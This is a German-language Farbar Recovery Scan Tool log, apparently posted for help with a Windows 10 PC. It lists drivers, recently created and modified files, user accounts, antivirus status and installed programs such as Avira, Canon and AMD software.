S3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [91384 2022-07-14] (Microsoft Windows -> Microsoft Corporation)
S3 wintun; C:\Windows\system32\DRIVERS\wintun.sys [29680 2021-10-07] (Microsoft Windows Hardware Compatibility Publisher -> WireGuard LLC)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 11:52 - 2022-07-21 11:52 - 000000000 ____D C:\AdwCleaner
2022-07-21 11:51 - 2022-07-21 11:51 - 008551608 _____ (Malwarebytes) C:\Users\chris\Desktop\adwcleaner.exe
2022-07-20 22:19 - 2022-07-21 12:19 - 000000000 ____D C:\Users\chris\Downloads\FRST
2022-07-20 16:58 - 2022-07-20 16:58 - 000157105 _____ C:\Users\chris\Downloads\rechnung-FM.F22014940233.pdf
2022-07-19 12:28 - 2022-07-21 12:20 - 000000000 ____D C:\FRST
2022-07-17 21:40 - 2022-07-17 21:40 - 2467378443 _____ C:\Windows\MEMORY.DMP
2022-07-17 21:40 - 2022-07-17 21:40 - 005480100 _____ C:\Windows\Minidump\071722-8656-01.dmp
2022-07-14 23:16 - 2022-07-14 23:24 - 000000214 _____ C:\Windows\Tasks\CreateExplorerShellUnelevatedTask.job
2022-07-14 23:15 - 2022-07-14 23:15 - 000000000 ____D C:\Windows\pss
2022-07-14 19:43 - 2022-06-15 09:28 - 000100376 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter2.sys
2022-07-14 18:27 - 2022-07-14 18:27 - 000003888 _____ C:\Windows\system32\Tasks\Avira_Security_Maintenance
2022-07-14 18:27 - 2022-07-14 18:27 - 000003428 _____ C:\Windows\system32\Tasks\Avira_Security_Service_SCM_Watchdog
2022-07-14 17:50 - 2022-07-14 17:50 - 000693248 _____ C:\Windows\system32\FsNVSDeviceSource.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000530944 _____ (curl, hxxps://curl.se/) C:\Windows\system32\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000470528 _____ (curl, hxxps://curl.se/) C:\Windows\SysWOW64\curl.exe
2022-07-14 17:50 - 2022-07-14 17:50 - 000270848 _____ C:\Windows\system32\EsclScan.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000152064 _____ C:\Windows\system32\EsclProtocol.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000033280 _____ (Microsoft Corporation) C:\Windows\system32\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000026624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mode.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000020992 _____ (Microsoft Corporation) C:\Windows\system32\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000018944 _____ C:\Windows\SysWOW64\WsdProviderUtil.dll
2022-07-14 17:50 - 2022-07-14 17:50 - 000017920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tree.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000012800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\chcp.com
2022-07-14 17:50 - 2022-07-14 17:50 - 000011811 _____ C:\Windows\system32\DrtmAuthTxt.wim
2022-07-14 17:49 - 2022-07-14 17:49 - 002260480 _____ C:\Windows\system32\TextInputMethodFormatter.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000640512 _____ C:\Windows\system32\SettingSyncDownloadHelper.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000288768 _____ C:\Windows\system32\Windows.Management.InprocObjects.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000061952 _____ C:\Windows\system32\printticketvalidation.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000057344 _____ C:\Windows\system32\APMonUI.dll
2022-07-14 17:49 - 2022-07-14 17:49 - 000024576 _____ C:\Windows\system32\WsdProviderUtil.dll
2022-07-14 17:44 - 2022-07-14 17:44 - 000000000 ___HD C:\$WinREAgent
2022-07-13 14:31 - 2022-07-13 14:31 - 000328985 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58 (1).jpeg
2022-07-13 14:31 - 2022-07-13 14:31 - 000171434 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-13 at 14.26.58.jpeg
2022-07-13 14:29 - 2022-07-13 14:29 - 000116599 _____ C:\Users\chris\Downloads\Probeklausur.pdf
2022-07-12 19:16 - 2022-07-12 19:16 - 000193337 _____ C:\Users\chris\Downloads\8104328_2022_Datenschutzrechtliche Einwilligung_vom_12.07.2022_20220712191654.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000076728 _____ C:\Users\chris\Downloads\8104328_2022_Nr.003_Kontoauszug_vom_31.03.2022_20220712191454.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000074601 _____ C:\Users\chris\Downloads\8104328_2022_Nr.001_Kontoauszug_vom_31.01.2022_20220712191449.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000073937 _____ C:\Users\chris\Downloads\8104328_2022_Nr.002_Kontoauszug_vom_28.02.2022_20220712191452.pdf
2022-07-12 19:14 - 2022-07-12 19:14 - 000067892 _____ C:\Users\chris\Downloads\8104328_2022_Nr.004_Kontoauszug_vom_29.04.2022_20220712191457.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000080969 _____ C:\Users\chris\Downloads\8104328_2022_Nr.005_Kontoauszug_vom_31.05.2022_20220712191347.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000074623 _____ C:\Users\chris\Downloads\8104328_2022_Nr.006_Kontoauszug_vom_30.06.2022_20220712191345.pdf
2022-07-12 19:13 - 2022-07-12 19:13 - 000060149 _____ C:\Users\chris\Downloads\8104328_2022_Ihr Rechnungsabschluss_vom_30.06.2022_20220712191341.pdf
2022-07-12 16:32 - 2022-07-12 16:33 - 002107659 _____ C:\Users\chris\Documents\IMG_20220712_0001.pdf
2022-07-12 16:26 - 2022-07-12 16:26 - 000282547 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-07-11 at 21.46.27.jpeg
2022-07-12 11:18 - 2022-07-12 11:18 - 000259752 _____ C:\Users\chris\Downloads\aufgaben_kap5.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000258142 _____ C:\Users\chris\Downloads\aufgaben_kap2.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000230124 _____ C:\Users\chris\Downloads\aufgaben_kap3.pdf
2022-07-12 11:18 - 2022-07-12 11:18 - 000223671 _____ C:\Users\chris\Downloads\aufgaben_kap1.pdf
2022-07-12 11:17 - 2022-07-12 11:17 - 000227308 _____ C:\Users\chris\Downloads\aufgaben_kap4.pdf
2022-07-11 19:12 - 2022-07-11 19:12 - 000299459 _____ C:\Users\chris\Downloads\Dritter_Hauptsatz.pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000087127 _____ C:\Users\chris\Downloads\Studienverlaufsbescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000073060 _____ C:\Users\chris\Downloads\BAföG Bescheinigung [PDF] (3).pdf
2022-07-11 11:05 - 2022-07-11 11:05 - 000072760 _____ C:\Users\chris\Downloads\Immatrikulationsbescheinigung [PDF] (9).pdf
2022-07-10 17:01 - 2022-07-10 17:02 - 000319960 _____ C:\Users\chris\Documents\Perso_2.pdf
2022-07-07 19:16 - 2022-07-07 19:16 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvortrage_W3-Physik_bioinspirierter_diskreter_Systeme147.pdf
2022-07-06 21:22 - 2022-07-06 21:22 - 000251922 _____ C:\Users\chris\Downloads\Vorstellungsvorträge W3-Physik bioinspirierter diskreter Systeme[147].pdf
2022-07-05 15:43 - 2022-07-05 15:44 - 000105989 _____ C:\Users\chris\Downloads\Super-PIN.pdf
2022-07-05 15:42 - 2022-07-05 15:42 - 000000754 _____ C:\Users\chris\Desktop\Dokumente - Verknüpfung.lnk
2022-07-05 14:48 - 2022-07-05 14:51 - 002613332 _____ C:\Users\chris\Documents\IMG_20220705_0001.pdf
2022-07-04 15:32 - 2022-07-04 15:35 - 002807761 _____ C:\Users\chris\Documents\IMG_20220704_0002.pdf
2022-07-04 15:18 - 2022-07-04 15:24 - 002778650 _____ C:\Users\chris\Documents\IMG_20220704_0001.pdf
2022-07-03 19:55 - 2022-07-03 19:55 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Fek
2022-07-03 19:54 - 2020-08-18 04:51 - 000000000 ____D C:\Users\chris\Documents\WIN64
2022-07-03 18:32 - 2022-07-03 18:32 - 000176776 _____ C:\Users\chris\Downloads\Thermodynamik (1).pdf
2022-07-03 18:30 - 2022-07-03 18:30 - 000176789 _____ C:\Users\chris\Downloads\Thermodynamik.pdf
2022-07-03 17:37 - 2022-07-03 17:37 - 000078801 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian (1).pdf
2022-07-01 21:42 - 2022-07-01 21:42 - 000000000 ____D C:\Windows\SysWOW64\ncp
2022-07-01 21:42 - 2022-06-15 09:28 - 000100128 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\netprotection_network_filter.sys
2022-07-01 21:41 - 2022-07-20 22:19 - 000000000 ____D C:\Users\Public\Speedup Sessions
2022-07-01 21:41 - 2022-07-14 23:18 - 000001236 _____ C:\Users\Public\Desktop\Avira.lnk
2022-07-01 21:41 - 2022-07-14 18:27 - 000003478 _____ C:\Windows\system32\Tasks\Avira_Security_Update
2022-07-01 21:41 - 2022-07-01 21:41 - 005601064 _____ (Avira Operations GmbH & Co. KG) C:\Users\chris\Downloads\avira_en_sptl1_1567964500-1646663480__phpws-spotlighttrialflow3-control.exe
2022-07-01 21:41 - 2022-07-01 21:41 - 000003778 _____ C:\Windows\system32\Tasks\AviraSystemSpeedupVerify
2022-07-01 21:41 - 2022-07-01 21:41 - 000002818 _____ C:\Windows\system32\Tasks\Avira_Security_Systray
2022-07-01 21:41 - 2022-07-01 21:41 - 000000000 ____D C:\Program Files\Avira
2022-07-01 21:41 - 2022-06-30 11:17 - 000202584 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_filesystem_filter.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000193304 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_process_monitor.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000047560 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_traverse.sys
2022-07-01 21:41 - 2022-06-30 11:17 - 000024024 _____ (Avira Operations GmbH) C:\Windows\system32\Drivers\rtp_elam.sys
2022-07-01 21:41 - 2022-06-21 17:57 - 000230520 _____ (Avira Operations GmbH & Co. KG) C:\Windows\system32\Drivers\BdSentry.sys
2022-06-30 19:24 - 2022-06-30 19:24 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54 (1).jpeg
2022-06-30 19:03 - 2022-06-30 19:03 - 000118047 _____ C:\Users\chris\Downloads\WhatsApp Image 2022-06-30 at 14.00.54.jpeg
2022-06-30 18:12 - 2022-06-30 18:12 - 000146362 _____ C:\Users\chris\Downloads\u11 (5).pdf
2022-06-29 20:09 - 2022-06-29 20:09 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Yabukaradoo
2022-06-29 19:51 - 2022-06-29 19:51 - 000000000 ____D C:\Users\chris\AppData\LocalLow\Laplace
2022-06-29 18:16 - 2022-06-29 18:16 - 000078535 _____ C:\Users\chris\Downloads\_Rechnung Juni 2022 - Sebastian.pdf
2022-06-29 12:28 - 2022-06-29 12:28 - 000146362 _____ C:\Users\chris\Downloads\u11 (4).pdf
2022-06-27 14:45 - 2022-06-27 14:47 - 002934336 _____ C:\Users\chris\Documents\IMG_20220627_0001.pdf
2022-06-26 16:46 - 2022-06-26 16:46 - 000000223 _____ C:\Users\chris\Desktop\Democracy 4.url
2022-06-26 12:40 - 2022-06-26 12:40 - 000146362 _____ C:\Users\chris\Downloads\u11 (3).pdf
2022-06-26 12:12 - 2022-06-26 12:12 - 000100026 _____ C:\Users\chris\Downloads\u10 (2).pdf
2022-06-22 21:49 - 2022-06-22 21:49 - 000100026 _____ C:\Users\chris\Downloads\u10 (1).pdf
2022-06-22 21:47 - 2022-06-22 21:47 - 000146362 _____ C:\Users\chris\Downloads\u11 (2).pdf
2022-06-22 19:14 - 2022-06-22 19:14 - 021972442 _____ C:\Users\chris\Downloads\7_Magnetische_Eigenschaften_von_Ferromagnetika (3).pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\fernabsatz_1741976447.pdf
2022-06-21 11:38 - 2022-06-21 11:38 - 000620671 _____ C:\Users\chris\Downloads\1741976447_c32aedbc-9e90-466b-ba75-004873f96082.pdf

==================== Ein Monat (geänderte) ==================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2022-07-21 12:17 - 2020-12-10 18:51 - 000000000 ____D C:\Program Files (x86)\Google
2022-07-21 12:15 - 2020-12-10 20:14 - 000000000 ____D C:\Program Files (x86)\Steam
2022-07-21 12:08 - 2022-04-19 20:35 - 000000000 ____D C:\Users\chris\AppData\Local\blow_the_leaves_away
2022-07-21 11:57 - 2020-12-10 18:58 - 000000000 ____D C:\ProgramData\NVIDIA
2022-07-21 11:40 - 2020-12-10 18:34 - 000000000 ___RD C:\Users\chris\OneDrive
2022-07-21 11:39 - 2022-03-02 16:07 - 000000000 ____D C:\Users\chris\AppData\Local\Oculus
2022-07-20 22:47 - 2022-03-02 17:27 - 000000000 ____D C:\Program Files\Oculus
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\AppReadiness
2022-07-20 22:47 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-07-20 22:46 - 2020-11-19 00:34 - 000000000 ____D C:\Windows\system32\SleepStudy
2022-07-20 22:30 - 2020-12-11 01:24 - 001822948 _____ C:\Windows\system32\PerfStringBackup.INI
2022-07-20 22:30 - 2019-12-07 16:50 - 000781196 _____ C:\Windows\system32\perfh007.dat
2022-07-20 22:30 - 2019-12-07 16:50 - 000166520 _____ C:\Windows\system32\perfc007.dat
2022-07-20 22:30 - 2019-12-07 11:13 - 000000000 ____D C:\Windows\INF
2022-07-20 22:25 - 2022-06-20 20:11 - 001183032 _____ C:\Windows\system32\rtp.db
2022-07-20 22:25 - 2020-12-11 01:18 - 000807280 _____ C:\Windows\system32\wpbbin.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000768408 _____ C:\Windows\system32\AsusUpdateCheck.exe
2022-07-20 22:25 - 2020-12-11 01:18 - 000008192 ___SH C:\DumpStack.log.tmp
2022-07-20 22:25 - 2020-11-19 01:34 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2022-07-20 22:25 - 2019-12-07 11:03 - 000786432 _____ C:\Windows\system32\config\BBI
2022-07-20 22:24 - 2021-04-16 19:38 - 000000000 ____D C:\Users\Lisa\AppData\LocalLow\Temp
2022-07-20 12:32 - 2020-12-10 20:02 - 000000000 ____D C:\Users\chris\AppData\Local\D3DSCache
2022-07-20 12:15 - 2020-12-10 18:52 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-19 13:21 - 2020-12-10 18:31 - 000000000 ____D C:\Users\chris
2022-07-19 00:06 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Roaming\discord
2022-07-18 23:51 - 2021-02-19 17:32 - 000000000 ____D C:\Users\chris\AppData\Local\Discord
2022-07-18 12:19 - 2021-01-05 14:23 - 000004232 _____ C:\Windows\system32\Tasks\Opera scheduled Autoupdate 1609849433
2022-07-18 12:19 - 2021-01-05 14:23 - 000001389 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Opera-Browser.lnk
2022-07-18 12:14 - 2022-03-02 17:29 - 000000000 ____D C:\ProgramData\Oculus
2022-07-17 21:49 - 2019-12-07 11:03 - 000000000 ____D C:\Windows\CbsTemp
2022-07-17 21:40 - 2022-05-08 20:33 - 000000000 ____D C:\Windows\Minidump
2022-07-17 17:43 - 2020-11-19 01:37 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-07-17 17:43 - 2020-11-19 01:37 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2022-07-15 12:03 - 2022-03-17 15:03 - 000000000 ____D C:\Users\chris\Downloads\DS4Windows
2022-07-15 11:22 - 2022-03-17 15:14 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2022-07-15 11:22 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2022-07-15 11:21 - 2022-03-17 15:06 - 000000000 ____D C:\Users\chris\AppData\Roaming\DS4Windows
2022-07-15 11:21 - 2021-09-09 14:12 - 000000000 ____D C:\Users\chris\AppData\Local\Ubisoft Game Launcher
2022-07-15 11:16 - 2021-01-12 20:22 - 000004240 _____ C:\Windows\system32\Tasks\Opera GX scheduled Autoupdate 1610475719
2022-07-15 11:16 - 2021-01-12 20:21 - 000001434 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Browser Opera GX.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000001345 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\PC Health Check.lnk
2022-07-15 01:48 - 2021-10-07 19:06 - 000000000 ___RD C:\Users\chris\AppData\Local\PCHealthCheck
2022-07-14 20:50 - 2020-11-19 00:34 - 000258000 _____ C:\Windows\system32\FNTCACHE.DAT
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\PrintDialog
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ___RD C:\Windows\ImmersiveControlPanel
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SysWOW64\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\SystemResources
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\WinMetadata
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\setup
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\oobe
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\es-MX
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\system32\DDFs
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellExperiences
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\ShellComponents
2022-07-14 20:49 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\bcastdvr
2022-07-14 19:18 - 2022-03-17 15:13 - 000281688 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2022-07-14 18:50 - 2020-11-19 01:34 - 000000000 ____D C:\Windows\system32\Drivers\wd
2022-07-14 18:50 - 2019-12-07 11:03 - 000032768 _____ C:\Windows\system32\config\ELAM
2022-07-14 18:27 - 2021-04-19 21:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2022-07-14 17:49 - 2020-11-19 01:36 - 003010560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2022-07-14 17:44 - 2020-12-10 18:36 - 000000000 ____D C:\Windows\system32\MRT
2022-07-14 17:42 - 2020-12-10 18:36 - 146546848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2022-07-14 11:45 - 2020-11-19 01:36 - 000003756 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-14 11:45 - 2020-11-19 01:36 - 000003632 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-07-13 18:13 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports
2022-07-12 20:27 - 2020-12-16 21:04 - 000000000 ____D C:\Users\chris\AppData\Local\CrashDumps
2022-07-12 17:40 - 2021-12-12 18:38 - 000003584 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:34 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:31 - 000002395 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-07 18:59 - 2021-01-05 14:23 - 000004464 _____ C:\Windows\system32\Tasks\Opera scheduled assistant Autoupdate 1609849435
2022-07-05 19:31 - 2020-12-10 21:55 - 000000000 ____D C:\ProgramData\boost_interprocess
2022-07-04 16:51 - 2020-12-14 13:53 - 000000000 ____D C:\ProgramData\CanonIJPLM
2022-07-03 19:36 - 2022-05-24 22:29 - 000000000 ____D C:\Users\chris\AppData\Roaming\RenPy
2022-07-01 21:42 - 2020-12-10 19:56 - 000000000 ____D C:\ProgramData\Avira
2022-07-01 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2022-07-01 21:41 - 2021-01-05 14:22 - 000000000 ____D C:\Program Files (x86)\Avira
2022-07-01 21:31 - 2020-12-10 18:37 - 000803176 _____ (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2022-06-29 20:27 - 2022-06-17 20:37 - 000000000 ____D C:\Users\chris\AppData\Roaming\dryad_quest
2022-06-26 17:17 - 2021-03-06 15:41 - 000000000 ____D C:\Users\chris\Documents\My Games
2022-06-26 16:46 - 2021-03-05 14:55 - 000000000 ____D C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-06-26 16:43 - 2020-12-10 22:11 - 000000000 ____D C:\ProgramData\Riot Games
2022-06-26 10:01 - 2020-11-19 01:38 - 000000000 ____D C:\ProgramData\Packages
2022-06-22 14:44 - 2022-02-01 11:45 - 000001423 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly.lnk
2022-06-22 14:44 - 2022-02-01 11:45 - 000001415 _____ C:\Users\chris\Desktop\Grammarly.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2022-06-08 21:06 - 2022-06-08 21:06 - 000008412 _____ () C:\Users\chris\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         
Addition:
Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 21-07-2022
durchgeführt von chris (21-07-2022 12:21:19)
Gestartet von C:\Users\chris\Downloads\FRST
Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) (2020-12-10 23:20:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================


(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

Administrator (S-1-5-21-292222086-413629167-3624375346-500 - Administrator - Disabled)
chris (S-1-5-21-292222086-413629167-3624375346-1001 - Administrator - Enabled) => C:\Users\chris
DefaultAccount (S-1-5-21-292222086-413629167-3624375346-503 - Limited - Disabled)
Gast (S-1-5-21-292222086-413629167-3624375346-501 - Limited - Disabled)
Lisa (S-1-5-21-292222086-413629167-3624375346-1006 - Limited - Enabled) => C:\Users\Lisa
WDAGUtilityAccount (S-1-5-21-292222086-413629167-3624375346-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Avira Security (Enabled - Up to date) {76C0BF9F-9FD3-D249-DE2F-7A33A59B9258}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

3DMark (HKLM\...\{63FED867-23CB-4AC7-9F22-64AD80FA0DA7}) (Version: 2.16.7117.0 - UL) Hidden
3DMark (HKLM-x32\...\{b6a95974-3bca-4571-9656-98b7350cb823}) (Version: 2.16.7113.0 - UL)
AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.09.28.509 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.) Hidden
AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.80 - Advanced Micro Devices, Inc.) Hidden
AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden
AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\{ad7f5f31-0d6f-40f2-83b1-5556e0d0f9b1}) (Version: 2.09.28.509 - Advanced Micro Devices, Inc.) Hidden
Anaconda3 2020.07 (Python 3.8.3 64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Anaconda3 2020.07 (Python 3.8.3 64-bit)) (Version: 2020.07 - Anaconda, Inc.)
Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.)
Asus ProductDaemonSetup (HKLM\...\{36606417-B1C4-42C2-B5C1-67972DA63DAB}) (Version: 3.6.4501 - ASUSTeK COMPUTER INC) Hidden
Asus Sonic Radar 3 (HKLM-x32\...\{f302c1fc-67c2-40b1-93c7-266d93310a2d}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC)
Asus Sonic Studio 3 (HKLM-x32\...\{44d9a0cd-0414-49c0-8488-dc0849f46bd1}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC)
Asus SonicRadar3Setup (HKLM\...\{09AE428F-CB54-42C8-8342-D0EC6E4136D0}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC) Hidden
Asus SonicStudio3Setup (HKLM\...\{ACA23ED7-018F-47AE-8C9C-2096E1455DA4}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC) Hidden
Avira Phantom VPN (HKLM-x32\...\Avira Phantom VPN) (Version: 2.41.1.25731 - Avira Operations GmbH & Co. KG) Hidden
Avira Security (HKLM-x32\...\Avira Security_is1) (Version: 1.1.69.30057 - Avira Operations GmbH & Co. KG) Hidden
Avira Security (HKLM-x32\...\AviraSecurityUninstaller) (Version:  - Avira Operations GmbH & Co. KG)
Avira System Speedup (HKLM-x32\...\Avira System Speedup_is1) (Version: 6.19.0.11413 - Avira Operations GmbH & Co. KG) Hidden
Breitbandmessung 2.0.4 (HKLM\...\14607473-30db-509f-94f0-bb7c085c619e) (Version: 2.0.4 - zafaco GmbH)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX2 (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX2) (Version: 2.0.5.3 - Canon Inc.)
Canon IJ Printer Assistant Tool (HKLM-x32\...\Canon IJ Printer Assistant Tool) (Version: 1.55.2.31 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.4.0.16 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 6.4.0 - Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.6.4 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.6.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.8.5 - Canon Inc.)
Canon TS3100 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_TS3100_series) (Version: 1.01 - Canon Inc.)
Canon TS3100 series On-Screen-Handbuch (HKLM-x32\...\Canon TS3100 series On-Screen-Handbuch) (Version: 1.4.0 - Canon Inc.)
Discord (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Discord) (Version: 0.0.309 - Discord Inc.)
Discord (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Discord) (Version: 0.0.309 - Discord Inc.)
Druckerregistrierung (HKLM-x32\...\Canon EISRegistration) (Version: 1.7.0 - Canon Inc.)
Endpoint Protection SDK (HKLM\...\{68E1CCB4-4965-4713-BDEB-77F6D6C9BF9D}_is1) (Version: 1.0.2206.3019 - Avira Operations GmbH & Co. KG) Hidden
